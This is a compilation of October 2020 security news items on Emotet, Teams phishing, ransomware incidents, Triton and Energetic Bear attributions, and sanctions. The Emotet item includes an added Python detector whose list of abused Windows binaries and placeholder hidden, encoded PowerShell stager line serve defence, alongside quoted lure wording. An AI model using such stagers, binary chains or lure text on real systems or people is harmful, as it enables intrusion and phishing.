Researchers this week observed Emotet attacks employing a new template that pretends to be a Microsoft Office message urging the recipient to update their Microsoft Word to add a new feature.

Emotet spam messages leverage templates to trick the victims into enabling macros to start the infection.

Once installed, Emotet downloads additional payloads onto the machine, including ransomware, and uses the machine to send spam emails.

The Emotet banking trojan has been active at least since 2014; the botnet is operated by a threat actor tracked as TA542. In mid-August, the malware was employed in a fresh COVID-19-themed spam campaign.

Recent spam campaigns used messages with malicious Word documents, or links to them, pretending to be an invoice, shipping information, COVID-19 information, resumes, financial documents, or scanned documents.

The infamous banking trojan is also used to deliver other malicious code, such as Trickbot and QBot trojan or ransomware such as Conti (TrickBot) or ProLock (QBot).

Emotet is a modular malware, its operators could develop new Dynamic Link Libraries to update its capabilities.

Recently, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to warn of a surge of Emotet attacks that have targeted multiple state and local governments in the U.S. since August.

During that time, the agency’s EINSTEIN Intrusion Detection System has detected roughly 16,000 alerts related to Emotet activity.

In a recent campaign observed on October 14th, the attackers are using multiple lures, including invoices, purchase orders, shipping information, COVID-19 information, and information about President Trump’s health.

The spam messages come with malicious Word (.doc) attachments or include links to download the bait document.

“Emotet switched to a new template this week that pretends to be a Microsoft Office message stating that Microsoft Word needs to be updated to add a new feature.” reported BleepingComputer.

Below is the message displayed to the recipient to trick them into enabling the macros.

Upgrade your edition of Microsoft Word
Upgrading your edition will add new feature to Microsoft Word.
Please click Enable Editing and then click Enable Content.

Upon enabling the macros, the Emotet malware is downloaded and installed into the victim’s %LocalAppData% folder.
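
The tell on the endpoint is the step the lure needs: Word spawning something it should not, in particular an executable sitting under the user's %LocalAppData%. The script below is an added example, not code from the article or from BleepingComputer. It classifies process-creation records shaped like Sysmon Event ID 1 (ParentImage, Image, CommandLine) and flags an Office parent whose child either lives under %LocalAppData% or is a script host such as powershell.exe. The script-host list goes beyond what the article states and is an assumption; the events are constructed.

```python
"""Flag Office applications spawning child processes, the footprint of a
macro-enabled lure such as the Word 'upgrade' template described above.

Added example, not from the article or BleepingComputer. Events are
constructed Sysmon-style process-creation records (Event ID 1).
"""
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and LOLBins a macro stager typically launches (assumption; the
# article only says Emotet lands in %LocalAppData%).
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
# Expanded form of %LocalAppData% for any user profile.
LOCALAPPDATA_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\", re.IGNORECASE)


def basename(path):
    """Lower-case file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return a reason string if the event is suspicious, else None."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return None
    child = event["Image"]
    if LOCALAPPDATA_RE.match(child):
        return "office_spawned_from_localappdata"
    if basename(child) in SUSPICIOUS_CHILDREN:
        return "office_spawned_script_host"
    return None


def scan(events):
    """Return [(ProcessId, reason)] for every suspicious event, in order."""
    results = []
    for event in events:
        reason = classify(event)
        if reason:
            results.append((event["ProcessId"], reason))
    return results


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"


def sample_events():
    """Constructed Sysmon Event ID 1 records (not real telemetry)."""
    return [
        # User opens the lure: benign, Word launched by the shell.
        {"ProcessId": 3980, "ParentImage": r"C:\Windows\explorer.exe",
         "Image": WINWORD, "CommandLine": f'"{WINWORD}" /n invoice_4471.doc'},
        # Macro drops and runs the payload from %LocalAppData%.
        {"ProcessId": 4120, "ParentImage": WINWORD,
         "Image": r"C:\Users\alice\AppData\Local\xqmrdk\xqmrdk.exe",
         "CommandLine": r"C:\Users\alice\AppData\Local\xqmrdk\xqmrdk.exe"},
        # Macro launches an encoded PowerShell stager.
        {"ProcessId": 4188, "ParentImage": WINWORD,
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell -nop -w hidden -enc <base64 stager>"},
        # Benign: 32-bit Office printing through the 64-bit driver host.
        {"ProcessId": 4203, "ParentImage": WINWORD,
         "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    ]


if __name__ == "__main__":
    for pid, reason in scan(sample_events()):
        print(pid, reason)
```

The %LocalAppData% rule catches the article's case directly; the script-host rule is what you would also want, since the drop usually goes through a scripting stage first. Expect to whitelist a handful of Office helper binaries per environment.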

“Due to this, it is important that all email users recognize malicious document templates used by Emotet so that you do not accidentally become infected.” concludes Bleeping Computer.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post New Emotet attacks use a new template urging recipients to upgrade Microsoft Word appeared first on Security Affairs.

Microsoft Teams phishing campaign targeted up to 50,000 Office 365 users

Experts warn of a phishing campaign that already targeted up to 50,000 Office 365 users with a fake automated message from Microsoft Teams.

Security researchers reported that up to 50,000 Office 365 users have been targeted by a phishing campaign that pretends to be an automated message from Microsoft Teams. The bait message uses fake notifications of a “missed chat” from Microsoft Teams; the campaign aims at stealing the Office 365 login credentials of recipients.

Like other collaboration and communications platforms, Microsoft Teams has risen in popularity since the beginning of the Covid-19 pandemic, because a growing number of organizations have adopted the remote working model. Threat actors are adapting their attack techniques to exploit the ongoing situation; researchers from Abnormal Security observed a campaign that hit between 15,000 and 50,000 Office 365 users.

“This attack impersonates an automated message from Microsoft Teams in order to steal recipient’s login credentials.” reads the report published by Abnormal Security. “The email is sent from the display name, ‘There’s new activity in Teams’, making it appear like an automated notification from Microsoft Teams. It appears to notify the recipient that their teammates are trying to reach them and urges the recipient to click on ‘Reply in Teams’. However, this leads to a phishing page.”

The bait email displays the name “There’s new activity in Teams” to trick the victims into believing that it is an automated notification from Microsoft Teams.

The email tells the recipient that they have missed Microsoft Teams chats and shows an example of a teammate chat that asks them to submit something by Wednesday of next week.

The researchers noted that the campaign is not targeted in nature, as the employee referenced in the chats does not appear to be an employee of the company that was targeted by the attackers.

Recipients can respond to the email by clicking on the “Reply in Teams” button in the body of the message, but this action redirects the victim to a phishing page.

“Within the body of the email, there are three links appearing as ‘Microsoft Teams’, ‘(contact) sent a message in instant messenger’, and ‘Reply in Teams’,” continues the analysis. “Clicking on any of these leads to a fake website that impersonates the Microsoft login page. The phishing page asks the recipient to enter their email and password.”

The phishing landing page looks like the Microsoft login page; its URL begins with “microsftteams” to appear legitimate.

“The attacker spoofed employee emails and also impersonated Microsoft Teams. The recipient is more likely to fall prey to an attack when it is believed to originate from within the company and also from a trusted brand.” concludes the report.

Pierluigi Paganini


Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware

The systems of the US-based ski and golf resort operator were infected with the WastedLocker ransomware; the incident impacted its reservation systems.

Boyne Resorts is a collection of mountain and lakeside resorts, ski areas, and attractions spanning from British Columbia to Maine. The company owns and operates eleven properties and an outdoor lifestyle equipment/apparel retail division with stores in cities throughout Michigan. An industry leader in multiple U.S. regions, its operations include snowsports and year-round mountain recreation, golf, an indoor waterpark, spas, food and beverage, lodging and real estate development.

Boyne Resorts was the victim of a WastedLocker ransomware attack; the incident impacted its reservation systems.

According to BleepingComputer, the attackers initially breached the corporate offices and then moved laterally to the IT systems of the resorts the company operates. As a result of the attack, the company was forced to shut down portions of its network to prevent the ransomware from spreading.

Customers were not able to make reservations at the resorts operated by the company.

The ransomware encrypted files and appended the “.easy2lock” extension to their names; this extension was previously associated with recent WastedLocker ransomware infections.

In July, smartwatch and wearable device maker Garmin had to shut down some of its connected services and call centers following a WastedLocker ransomware attack.

In June, security experts from Symantec reported that at least 31 organizations in the United States had been targeted with the recently discovered WastedLocker ransomware.

Researchers from NCC Group, and later Symantec, confirmed that the malware was developed by the Russian cybercrime crew known as Evil Corp, which was behind the Dridex Trojan and multiple ransomware families such as Locky, Bart, Jaff, and BitPaymer.

Most of the victims belong to the manufacturing industry, followed by IT and media and telecommunications sectors.

The group has been active since at least 2007. In December 2019, the U.S. Treasury Department imposed sanctions on Evil Corp for causing more than $100 million in financial damages.

The U.S. Department of Justice (DoJ) has charged Russian citizens Maksim V. (32) and Igor Turashev (38) for distributing the infamous Dridex banking Trojan, and for their involvement in international bank fraud and computer hacking schemes.

Ransom payments to WastedLocker operators are prohibited by US authorities, which means that Boyne Resorts could face severe sanctions if it pays the ransom.

Pierluigi Paganini


US Treasury imposes sanctions on a Russian research institute behind Triton malware

The US Treasury Department announced sanctions against Russia’s Central Scientific Research Institute of Chemistry and Mechanics, the institute behind the Triton malware.

The US Treasury Department announced sanctions against a Russian research institute for its alleged role in the development of the Triton malware.

“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) designated, pursuant to Section 224 of the Countering America’s Adversaries Through Sanctions Act (CAATSA), a Russian government research institution that is connected to the destructive Triton malware.” reads a press release published by the Department of the Treasury.

Triton is a strain of malware specifically designed to target industrial control systems (ICS); it was spotted by researchers at FireEye in December 2017.

The malware was first spotted after it was employed in 2017 in an attack against a Saudi petrochemical plant owned by the privately-owned Saudi company Tasnee. According to the experts, the infection caused an explosion.

“In August 2017, a petrochemical facility in the Middle East was the target of a cyber-attack involving the Triton malware. This cyber-attack was supported by the State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM), a Russian government-controlled research institution that is responsible for building customized tools that enabled the attack.” continues the press release.

The Triton malware is designed to target Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers that are used in industrial environments to monitor the state of a process and restore it to a safe state or safely shut it down if parameters indicate a potentially hazardous situation.

“Mandiant recently responded to an incident at a critical infrastructure organization where an attacker deployed malware designed to manipulate industrial safety systems. The targeted systems provided emergency shutdown capability for industrial processes.” reads the analysis published by FireEye in 2017.

“We assess with moderate confidence that the attacker was developing the capability to cause physical damage and inadvertently shutdown operations. This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.”


Once they had gained access to the SIS system, the threat actors deployed the TRITON malware, which indicates that the attackers had knowledge of such systems. According to FireEye, the attackers pre-built and tested the tool, which would require access to hardware and software that is not widely available. TRITON is also designed to communicate using the proprietary TriStation protocol, which is not publicly documented; this implies that the attackers reverse engineered the protocol to carry out the attack.

The Triton malware interacts with Triconex SIS controllers; it is able to read and write programs and functions to and from the controller.


The hackers deployed the Triton malware on a Windows-based engineering workstation, and the malicious code added its own programs to the controller’s execution table. In case of a failure, the malware attempts to return the controller to a running state; if that attempt fails, it overwrites the malicious program with junk data, likely to remove any trace of the attack.

The US Treasury Department imposed sanctions on the State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics (also known as CNIIHM or TsNIIKhM).

In October 2018, FireEye experts discovered a link between the actor behind the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a Russian government research institute in Moscow.

FireEye collected strong evidence suggesting that the Russian CNIIHM institute has been involved in the development of some of the tools used in the Triton attack.

“FireEye Intelligence assesses with high confidence that intrusion activity that led to deployment of TRITON was supported by the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM; a.k.a. ЦНИИХМ), a Russian government-owned technical research institution located in Moscow. The following factors supporting this assessment are further detailed in this post.” reads the analysis published by FireEye.

  1. FireEye uncovered malware development activity that is very likely supporting TEMP.Veles activity. This includes testing multiple versions of malicious software, some of which were used by TEMP.Veles during the TRITON intrusion.
  2. Investigation of this testing activity reveals multiple independent ties to Russia, CNIIHM, and a specific person in Moscow. This person’s online activity shows significant links to CNIIHM.
  3. An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.
  4. Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.
  5. We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.” 

Experts pointed out that Triton is linked to Russia, the CNIIHM, and an individual located in Moscow. Some of the TEMP.Veles hacking tools were tested using an unnamed online scan service. A specific user of the service, active since 2013, tested various tools over time.

The user also tested several customized versions of widely available tools, including Metasploit, Cobalt Strike, PowerSploit, the PowerShell-based WMImplant, and cryptcat.

In many cases, the custom versions of the tools were used in TEMP.Veles attacks just days after being submitted to the testing environment.

The experts discovered that a PDB path contained in a tested file included a string that appears to be an online moniker associated with a Russia-based individual active in Russian information security communities since at least 2011.

According to a now-defunct social media profile, the individual was a professor at CNIIHM.

FireEye also discovered that one IP address registered to the Russian research institute was involved in the Triton attacks.

The sanctions prohibit US entities from engaging with CNIIHM and also block any assets on US soil belonging to the research institute.

“The Russian Government continues to engage in dangerous cyber activities aimed at the United States and our allies,” said Secretary Steven T. Mnuchin. “This Administration will continue to aggressively defend the critical infrastructure of the United States from anyone attempting to disrupt it.”

“TsNIIKhM is being designated pursuant to Section 224 of CAATSA for knowingly engaging in significant activities undermining cybersecurity against any person, including a democratic institution, or government on behalf of the Government of the Russian Federation.” continues the press release.

“As a result of today’s designation, all property and interests in property of TsNIIKhM that are in or come within the possession of U.S. persons are blocked, and U.S. persons are generally prohibited from engaging in transactions with them. Additionally, any entities 50 percent or more owned by one or more designated persons are also blocked. Moreover, non-U.S. persons who engage in certain transactions with TsNIIKhM may themselves be exposed to sanctions.”

On Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint report that provides details about a hacking campaign by the Russian group known as Energetic Bear.

The EU Council also imposed sanctions on two Russian intelligence officers for their role in the 2015 Bundestag hack.

Pierluigi Paganini


Flare-On 7 Challenge Solutions

We are thrilled to announce the conclusion of the seventh annual Flare-On challenge. This year proved to be the most difficult challenge we’ve produced, with the lowest rate of finishers. This year’s winners are truly the elite of the elite! Lucky for them, all 260 winners will receive this cyberpunk metal key.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. fidler – Nick Harbour (@nickharbour)
  2. garbage – Jon Erickson
  3. Wednesday – Blaine Stancill (@MalwareMechanic)
  4. report – Moritz Raabe (@m_r_tz)
  5. TKApp – Moritz Raabe (@m_r_tz)
  6. CodeIt – Mike Hunhoff (@mehunhoff)
  7. re_crowd – Chris Gardner, Moritz Raabe, Blaine Stancill
  8. Aardvark – Jacob Thompson
  9. crackinstaller – Paul Tarter (@Hefrpidge)
  10. break – Chris Gardner
  11. Rabbit Hole – Sandor Nemes (@sandornemes)

This year’s Flare-On challenge was the first to feature a live public scoreboard, so players could track their progress and the progress of previous Flare-On challenge champions. Despite this increased data at your fingertips, we are still going to bring you even more stats. As of 11:00am ET, participation was near record setting levels at 5,648 players registered. 3,574 of those players finished at least one challenge.

The U.S. reclaimed the top spot for total finishers with 22. Singapore was once again in second place, but in uncontested first place per capita, with one Flare-On finisher for every 296,000 living persons in Singapore. This is the first year we have included a per capita finishers by country chart, and we did it to highlight just what a remarkable concentration of talent exists in some corners of the world. Consistent top finisher Russia took third place, and a growing player base in Germany and Israel came into full bloom this year, with those countries edging out other frequent top five countries such as China, India and Vietnam.

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11

Threat Roundup for October 16 to October 23

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between October 16 and October 23. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201023-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 16 to October 23 appeared first on Cisco Blogs.

IoT Device Takeovers Surge 100 Percent in 2020

The COVID-19 pandemic, coupled with an explosion in the number of connected devices, have led to a swelling in IoT infections observed on wireless networks.

Sopra Steria hit by the Ryuk ransomware gang

French IT outsourcer Sopra Steria hit by ‘cyberattack’, Ryuk ransomware suspected

French IT outsourcer Sopra Steria has been hit by a ransomware attack. While the company did not reveal the malware family that infected its systems, local media speculate that the Ryuk ransomware was involved.

“A cyber attack was detected on the Sopra Steria computer network on the evening of October 20. Security measures have been taken to limit the risk of propagation.” reads the press release published by the company. “The Group’s teams are fully mobilized to ensure a return to normal as quickly as possible and everything is done to ensure business continuity. Sopra Steria is in close contact with its customers and partners as well as with the competent authorities.”

The European IT firm has 46,000 employees operating in 25 countries worldwide. It provides a wide range of IT services, including software development and consulting.

“According to our sources, the incident started to spread during the course of last night. The Active Directory infrastructure would be affected. And part of the information system would have been encrypted.” reported the website LeMagit. “Two sources tell us that the ransomware involved is none other than Ryuk. Surprise, researcher JamesWT_MHT found on VirusTotal a copy of an executable which two sources have confirmed to us is used internally at ESN for the generation of email signatures.”

French authorities are investigating the incident.

Sopra Steria is a member of France’s Cyber Campus, a French initiative to spread cybersecurity awareness, training, and product sales.

The Ryuk ransomware operators were very active early this year; in March they targeted hospitals even as these organizations were engaged in the fight against the coronavirus pandemic.

In September, the healthcare provider Universal Health Services (UHS) reportedly shut down systems at its healthcare facilities after a Ryuk ransomware attack.

In March, the City of Durham shut down its network after a Ryuk ransomware attack.

A few days earlier, EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, had been hit by the Ryuk ransomware.

The list of the victims of the Ryuk ransomware is very long and includes the US government contractor Electronic Warfare Associates (EWA), US railroad company Railworks, Croatian petrol station chain INA Group, and parts manufacturer Visser Precision.

Pierluigi Paganini


Iran-Linked Seedworm APT targets orgs in the Middle East

The Iran-linked cyber espionage group tracked as Seedworm started using a new downloader and is conducting destructive attacks.

The Iran-linked cyber-espionage group Seedworm (aka MuddyWater, MERCURY, and Static Kitten), first analyzed in 2017, was observed using a new downloader in a new wave of attacks. Security experts pointed out that the threat actor has started conducting destructive attacks.

The first MuddyWater campaign was observed in late 2017, when researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ because of the confusion in attributing the attacks, which took place between February and October 2017 and targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

Earlier this month, the Iranian APT group was observed actively targeting the Zerologon flaw.

According to the security firms ClearSky and Symantec, Seedworm recently started using a new downloader dubbed PowGoop. Experts noticed that the threat actors used the downloader to deliver the Thanos ransomware in an attack aimed at an organization in the Middle East.

“PowGoop is a loader that was exposed in a PaloAlto report and later used in Operation Quicksand. PowGoop is comprised of a DLL Loader and a PowerShell-based downloader.” reads the report published by ClearSky. “The malicious file impersonates a legitimate goopdate.dll file that is signed as a Google Update executable”

The experts observed the attacks between July 6 and July 9, 2020. The hackers employed a strain of ransomware that was able to evade security tools and that implemented a destructive feature by overwriting the MBR.

Experts pointed out that the primary objective of previous MuddyWater campaigns was cyber espionage, but in the latest campaign, tracked as ‘Operation Quicksand’, the threat actors used destructive malware for the first time, in attacks on prominent organizations in Israel and in other countries around the world.

“We assess that the group is attempting to employ destructive attacks (the likes of the NotPetya attack from 2017), via a disguised as ransomware attacks” continues the report.

“Although we didn’t see execution of the destruction in the wild, due to the presence of the destructive capabilities, the attribution to nation-state sponsored threat actor, and the realization of this vector in the past, a destructive purpose is more likely than a ransomware that is being deployed for financial goals.”

Another report, published by Symantec, connected the dots between MuddyWater and the PowGoop downloader.

“In several recent Seedworm attacks, PowGoop was used on computers that were also infected with known Seedworm malware (Backdoor.Mori). In addition to this, activity involving Seedworm’s Powerstats (aka Powermud) backdoor appears to have been superseded by DLL side-loading of PowGoop.” reads the report published by Symantec.

“Additionally, during PowGoop activity, we also observed the attackers downloading tools and some unknown content from GitHub repos, similar to what has been reported on Seedworm’s Powerstats in the past.”

Symantec researchers noticed that on the same machine where Seedworm was active, the attackers deployed the PowGoop downloader, which is known to be part of Seedworm’s arsenal.

PowGoop appears to have been employed in attacks aimed at governments, education, oil and gas, real estate, technology, and telecoms organizations in Afghanistan, Azerbaijan, Cambodia, Iraq, Israel, Georgia, Turkey, and Vietnam.

Symantec’s analysis revealed that PowGoop masquerades as a Google tool; the researchers also noticed the use of SSF and Chisel.

Experts speculate that the PowGoop downloader might be an evolution of the Powerstats tool employed by MuddyWater in previous attacks.

“Symantec has not found any evidence of a wiper or ransomware on computers infected with PowGoop,” Symantec concludes. “This suggests that either the simultaneous presence of PowGoop and Thanos in one attack was a coincidence or, if the two are linked, that PowGoop is not used exclusively to deliver Thanos.”

Pierluigi Paganini


FBI and CISA joint alert blames Russia’s Energetic Bear APT for US government networks hack

The US government declared that Russia-linked APT group Energetic Bear has breached US government networks and exfiltrated data.

A joint security advisory published by The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) revealed that Russia-linked APT group Energetic Bear has breached US government networks and exfiltrated data.

The Energetic Bear APT group (aka Dragonfly, Crouching Yeti, TEMP.Isotope, Berserk Bear, TeamSpy, Havex, and Koala) has been active since at least 2010; most of the group’s victims are organizations in the energy and industrial sectors.

In March 2018, the Department of Homeland Security and the Federal Bureau of Investigation issued a joint technical alert to warn of attacks on US critical infrastructure carried out by Russian threat actors. The US-CERT blamed the APT group tracked as Dragonfly, Crouching Yeti, and Energetic Bear.

This joint advisory provides information on Russia-linked APT actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. 

Officials said the group has been targeting dozens of US state, local, territorial, and tribal (SLTT) government networks since at least February 2020.

Energetic Bear successfully compromised the infrastructure and as of October 1, 2020, exfiltrated data from at least two victim servers.

“Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets.” reads the advisory. “The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.”

The Russian state-sponsored APT actor uses previously obtained user and administrator credentials to access the target network and then performs lateral movement to locate high-value assets and exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to sensitive network configurations and passwords, standard operating procedures (SOPs), IT instructions (such as requesting password resets), vendor and purchasing information, and printing access badges.

This advisory updates another joint CISA-FBI cybersecurity advisory, which warned of attackers combining VPN and Windows Zerologon flaws to target government networks.

The new advisory attributes the cyber attacks to the Russian threat actor and includes technical details about Energetic Bear’s TTPs.

The state-sponsored hackers scanned for vulnerable Citrix (CVE-2019-19781) and Microsoft Exchange services (CVE-2020-0688) and identified vulnerable installs for future exploitation.

According to the technical advisory, Russian hackers used publicly known vulnerabilities to breach networking gear, pivot to internal networks, elevate privileges, and steal sensitive data.

Hackers also targeted Exim mail agents (CVE-2019-10149) and Fortinet SSL VPNs (CVE-2018-13379).

Once they had gained access to the target networks, the Russian hackers moved laterally, exploiting the Zerologon vulnerability in Windows Server (CVE-2020-1472) to steal Windows Active Directory (AD) credentials and take over the target’s internal network.

“To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence US policies and actions, or to delegitimize SLTT government entities,” continues the alert.

“As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised.”

Pierluigi Paganini


US whistleblower Edward Snowden receives permanent residency from Russian authorities

The popular US whistleblower Edward Snowden has been granted permanent residency in Russia; the announcement was made by his lawyer.

The former CIA employee and National Security Agency contractor Edward Snowden (37) has been granted permanent residency in Russia, his lawyer announced on Thursday.

In 2013, Edward Snowden shed light on the mass surveillance program operated by the US government to spy on its citizens and allies.

The man expressed his desire to return to the United States where he is considered a criminal and a threat to homeland security due to his revelation. Snowden is wanted in the United States on espionage charges after he revealed details on the surveillance apparatus used by the National Security Agency (NSA) to collect telephone records of millions of US citizens. 

According to his lawyer Anatoly Kucherena, Snowden’s residency permit was extended as a result of recent changes to Russia’s immigration law. The residency permit is now indefinite, AFP reported.

“Kucherena said it was ‘natural’ that Snowden wanted to return to the United States but will only do so when the case against him is closed,” reported AFP.


The application was filed in April, but the decision of the Russian authorities was made public only this week due to a delay in the process caused by the ongoing COVID-19 pandemic.

It is not clear if Snowden plans to apply for Russian citizenship.

Earlier this year, US President Donald Trump announced that he was evaluating the possibility of pardoning Snowden but he did not provide further details on the case. 

In 2015 the White House rejected a petition calling on then-president Barack Obama to pardon the popular US whistleblower.

In September 2019, the US DoJ filed a lawsuit against Edward Snowden to prevent the former CIA employee and National Security Agency contractor from receiving the payment for his book, Permanent Record.

According to the civil lawsuit, filed in the Eastern District of Virginia, Snowden violated non-disclosure agreements signed when he was an employee at the US intelligence agencies.

Pierluigi Paganini

(SecurityAffairs – hacking, Snowden)

The post US whistleblower Edward Snowden received permanent residency by Russian authorities appeared first on Security Affairs.

EU Council sanctions two Russian military intelligence officers over 2015 Bundestag hack

The Council of the European Union announced sanctions imposed on Russian military intelligence officers for the 2015 Bundestag hack.

The Council of the European Union announced sanctions imposed on Russian military intelligence officers, belonging to the 85th Main Centre for Special Services (GTsSS), for their role in the 2015 attack on the German Federal Parliament (Deutscher Bundestag).

The 85th Main Centre for Special Services (GTsSS) is the military unit of the Russian government also tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM).

The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 US Presidential election.

“The Council today imposed restrictive measures on two individuals and one body that were responsible for or took part in the cyber-attack on the German Federal Parliament (Deutscher Bundestag) in April and May 2015.” reads the press release published by the Council. “This cyber-attack targeted the parliament’s information system and affected its ability to operate for several days. A significant amount of data was stolen and the email accounts of several members of parliament, including that of Chancellor Angela Merkel, were affected.”

Immediately after the attack, the daily Der Spiegel speculated that the Russian Government was behind it.


The attackers used a sophisticated strain of malware to breach the Bundestag network and siphon off sensitive data. The experts who analyzed the malicious code employed in the hack found many similarities with a piece of malware used in a previous attack against a German Government network that took place in 2014.

“The cyber attack on the “Parlakom” network was discovered in early May. At the parliamentary IT network 20,000 Bundestag accounts are connected – including German Chancellor Angela Merkel and other government officials.” continues Der Spiegel.

The EU’s sanctions imposed on the Russian military officers include travel bans and asset freezes; they also block EU organizations and individuals from transferring funds to the sanctioned entities and individuals.

The Council’s sanctions target a total of 8 persons and 4 entities and bodies.

“Sanctions are one of the options available in the Union’s framework for a joint diplomatic response to malicious cyber activities (the so-called cyber diplomacy toolbox), and are intended to prevent, discourage, deter and respond to continuing and increasing malicious behaviour in cyberspace,” a press release published earlier reads. “The relevant legal acts, including the names of the individuals and the body concerned, have been published in the Official Journal.”

The two officers sanctioned by the Council of the European Union, Dmitry Sergeyevich Badin and Igor Olegovich Kostyukov, are known members of the GTsSS.

The two officers were also indicted by the US DoJ in October 2018, along with five other members of the Russian Main Intelligence Directorate (GRU), for hacking, wire fraud, identity theft, and money laundering.

Kostyukov was also targeted by an executive order issued by President Barack Obama in 2016 that imposed sanctions on a number of Russian military and intelligence officials in response to the alleged hacking campaigns against the 2016 US Presidential Election.

Kostyukov is the current chief of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU/GRU).

“In this capacity, Igor Kostyukov is responsible for cyber-attacks carried out by the GTsSS, including those with a significant effect constituting an external threat to the Union or its Member States,” states the Council. “In particular, military intelligence officers of the GTsSS took part in the cyber-attack against the German federal parliament (Deutscher Bundestag) which took place in April and May 2015 and the attempted cyber-attack aimed at hacking into the Wi-Fi network of the Organisation for the Prohibition of Chemical Weapons (OPCW) in the Netherlands in April 2018.”

In July 2020, for the first time ever, the EU imposed economic sanctions on Russia, China, and North Korea following cyber-attacks aimed at the EU and its member states.

The EU Council announced sanctions imposed on a Russia-linked military espionage unit, as well as companies operating for Chinese and North Korean threat actors that launched cyber-attacks against the EU and its member states.

The sanctions were imposed as part of a legal framework established on May 17, 2019, which allows the EU to impose targeted restrictive measures to deter and respond to cyber-attacks aimed at the EU or its member states.

Pierluigi Paganini


Cisco addresses 17 high-severity flaws in security appliances

Security Advisory Bundled Publication for October 2020 – Cisco announced the release of patches for 17 high-severity flaws in its security appliances.

Cisco announced the release of security patches for 17 high-severity vulnerabilities in its security appliances as part of its Security Advisory Bundled Publication for October 2020.

The vulnerabilities impact Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC).

“The October 21, 2020 release of the ASA, FMC, and FTD Software Security Advisory Bundled Publication includes 17 Security Advisories that describe 17 vulnerabilities in ASA, FMC, and FTD Software. Cisco has released software updates for these vulnerabilities.” states the advisory.

“All of these vulnerabilities have a Security Impact Rating (SIR) of High.”

Most of the vulnerabilities addressed by the IT giant can be exploited by remote, unauthenticated attackers. The list of addressed vulnerabilities includes denial-of-service (DoS), CSRF, FMC authentication bypass, and MitM issues.

